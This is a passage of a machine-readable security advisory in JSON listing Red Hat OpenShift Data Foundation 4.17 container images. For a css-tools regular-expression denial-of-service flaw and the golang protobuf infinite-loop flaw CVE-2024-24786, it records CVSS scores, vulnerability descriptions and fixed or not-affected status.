"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression"
},
{
"cve": "CVE-2024-24786",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2024-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268046"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang\u0027s protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
